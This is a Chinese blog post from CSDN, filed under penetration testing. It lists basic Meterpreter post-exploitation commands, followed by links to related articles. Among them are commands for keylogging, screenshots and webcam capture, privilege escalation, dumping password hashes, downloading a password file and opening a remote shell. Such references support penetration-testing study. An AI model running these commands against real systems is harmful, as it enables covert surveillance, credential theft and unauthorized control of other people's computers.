Metasploit渗透——meterpreter基础命令

最新推荐文章于 2024-02-27 09:22:38 发布
最新推荐文章于 2024-02-27 09:22:38 发布
阅读量265 收藏 3
点赞数
分类专栏: 渗透测试 文章标签: linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/negnegil/article/details/120305541
版权

Meterpreter
系统信息

sysinfo

用户标识

getuid

获取权限

getsystem

当前目录

pwd

列举进程

ps

键盘记录

##扫描远程计算机键盘活动
keyscan_start

##显示远程计算机键盘活动
keyscan_dump

##停止扫描远程计算机键盘活动
keyscan_stop

在这里插入图片描述

显示驱动器

show_mount

截屏
保存远程PC的屏幕截图

screenshot

在这里插入图片描述

从kali上传文件

upload /root/abc.exe C:\\system32\\

下载

download C:\\pass.txt /root/

获取远程计算机的cmd

shell

服务器sid

getsid

远程计算机IP地址及Mac地址

ipconfig

将当前活动的Meterpreter会话发送到后台

background

将当前进程从一个端口迁移到另一个

migrate <端口>

在这里插入图片描述

重启远程计算机

reboot

摄像头

##查看是否具有摄像头
webcarm_list

##摄像头拍摄照片
webcam_snap

##摄像头开启视频
webcam_stream

当前进程的pid

getpid

当地时间

localtime

生成文件hash值

checksum md5 abc.txt

读取文件

cat my.ini

复制文件

cp abc.txt pass.txt
cp <旧文件> <新文件>

目录

dir

编辑文件

edit abc.txt
##和vim命令的使用方法相同

移动文件

mv <旧文件目录> <新文件目录>
##和linux中的mv命令相同

删除文件

rm <file1> <file2> ...
##和linux中的rm命令相同

创建目录

mkdir <目录名1> <目录名2> ...

搜索

search -f *.jpeg

开启靶机3389端口

run getgui -e

枚举账户hash散列值

run hashdump

列举后渗透模块

load -l

在这里插入图片描述

Thgilil
关注
专栏目录
metasploit-framework-master.zip
09-08
Metasploit框架详解——渗透测试利器》 Metasploit Framework,简称MSF,是一款开源的安全漏洞检测和利用工具,广泛应用于网络安全评估和渗透测试。它由 Rapid7 维护,是全球黑客社区的重要资源,同时也是信息...
关于 后渗透 - Meterpreter 的使用
辉小鱼的博客
09-05 2359
关于 Metasploit (MSF) 工具的后渗透 - Meterpreter 的学习与使用。了解一些漏洞的基本原理及使用方法。
Kali利用msf渗透Windows电脑(超详细)
最新发布
jennycisp的博客
02-27 2830
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
详尽的msf——meterpreter——渗透测试教程
m0_61101264的博客
11-02 512
本文仅供学习参考使用,切勿用于非法事情!!众所周知,msf是大家公认的神器,年少不知msf香,总想自己写程序。现在发现msf很厉害,可以在它的基础上开发。msf是框架,什么意思呢,用它可以做渗透攻击的一整套流程,包括前期探索(发育),中期攻击(开团),后期控守(推塔)我们可以在msfconsole上,开发自己的程序(用自己的英雄),程序可以利用msf中的模块(用它的装备)Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。
渗透测试——Meterpreter
YT的博客
02-18 2061
Meterpreter 优点: 平台通用性:Meterpreter 提供了基于 JAVA 和 PHP 语言的实现,以应用在各种不同的环境中 纯内存工作模式:执行漏洞渗透攻击的时候,会直接装载 Meterpreter 的动态链接库到目标进程空间中,而不是先将 Meterpreter 上传到磁盘然后再调用 Loadlibrary 加载动态链接库来启动 Meterpreter。这里便会有一个技术...
metasploit中文使用指南
08-18
此外,Metasploit还提供了一个功能强大的交互式环境——Meterpreter,用于后渗透阶段的进一步操作。 二、安装与配置 在Windows、Linux或Mac OS等操作系统上,你可以通过Ruby Gems来安装Metasploit。首先确保系统...
T00LS Metasploit(第一季).zip
03-11
Metasploit实战指南——T00LS第一季》 Metasploit,作为全球最知名的开源安全渗透测试框架,是网络安全专业人士不可或缺的工具之一。它主要用于模拟攻击,帮助安全专家评估系统漏洞,验证网络防御的有效性。T00LS...
Meterpreter使用总结(1)
热门推荐
CODING...
02-08 2万+
meterpreter是我最喜欢使用的攻击payload,经常都会使用windows/meterpreter/reverse_tcp作为携带的payload来进行测试,下面就meterpreter的基本使用进行一个总结:
12.5、后渗透测试--内网主机屏幕截图
无痕的博客
12-14 1402
metasploit渗透meterpreter测试--内网主机屏幕截图
Metasploit(一)--Meterpreter命令速查表
weixin_34167819的博客
08-27 871
原文:http://www.2cto.com/Article/201311/259669.html第1步:核心命令? – 帮助菜单background – 将当前会话移动到背景bgkill – 杀死一个背景 meterpreter 脚本bglist – 提供所有正在运行的后台脚本的列表bgrun – 作为一个后台线程运行脚本channel – 显示活动频道close – 关闭...
Metasploit使用教程(操作实例,meterpreter,msfconsole,msfcli,抓包)
qq_44111753的博客
12-13 6248
1、控制Metasploit终端(MSFCONSOLE) MSFCONSOLE主要用于管理Metasploit数据库,管理会话,配置并启动Matasploit模块 一些通用命令: help:该命令允许用户查看执行命令的帮助信息 use module:该命令允许用户加载选择的模块 set optionname module:该命令允许用户为模块设置不同的选项。 run:该命令用来启动一个非渗透攻击模块 search module:该命令允许用户搜索一个特定的模块 exit:退出MSFCONSOLE 操作步骤:
37. Metasploit渗透攻击:Meterpreter系统命令
__Qian的博客
03-18 2890
1.查看系统信息 命令: sysinfo 2.查看是否为虚拟机 命令:run post/windows/gather/checkvm 3.查看运行时间 命令:idletime 4.查看完整网络配置 命令:route 5.查看当前权限 命令:getuid 6.关闭杀毒软件 命令:run post/windows/manage/killav 7.启动远程桌面 命令:run post/win...
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 9039
MeterpreterMetasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
meterpreter使用详解
lweiheng blog
01-07 4076
meterpreter使用详解 文章目录meterpreter使用详解0 meterpreter简介1 meterpreter控制技巧总结1.1 命令详解1.2 sessions 控制命令1.3 meterpreter收集信息1.3.1 meterpreter 收集windows主机信息1.3.1.1 收集系统信息1.3.1.2 收集本地(域)用户信息1.3.1.3 收集当前用户信息1.3.1.4...
metasploit渗透入门--meterpreter
Yale的博客
01-14 3233
0x01利用漏洞拿到Meterpreter。 将存放在桌面上的exploit文件复制到metasploit系统指定的exploits存储路径中,并将exploit的属性设置为644. cp ~/Desktop/ms14_064_ole_exploit.rb /usr/share/metasploit-framework/modules/exploits/windows/browser/ chmod...
永恒之蓝(ms017-010)漏洞利用
菜鸟-传奇
04-09 1630
永恒之蓝(ms017-010)漏洞利用 1、实验环境 靶机win7 地址:192.168.1.xxx 登录密码:xxxx 攻击机:kaillinux 地址:192.168.1.xxx 登录用户名:root 登录密码:xxx 2、实验原理: “永恒之蓝”的原理主要是扫描所有开放445文件共享端口的Windows机器。 445端口简介: 445端口是一个毁誉参半的端口,有了它我们可以...
Metasploit渗透命令大全讲解——超详细
渗透测试
05-14 3984
文章目录前言一、基本后渗透命令1.帮助菜单2.后台命令3.机器ID和UUID命令4.通信信道5.获取用户和进程信息6.获取系统信息7.网络命令总结 前言 获取meterpreter权限后,使用后渗透命令完成目的操作 一、基本后渗透命令 获取meterpreter可以使用的命令,用来控制目标主机 1.帮助菜单 meterpreter > help Core Commands ============= Command Description
Metasploit渗透测试框架基础知识详解
Metasploit渗透测试框架基础 Metasploit渗透测试框架基础渗透测试领域的基础知识, Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。该框架附带数百个已知软件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值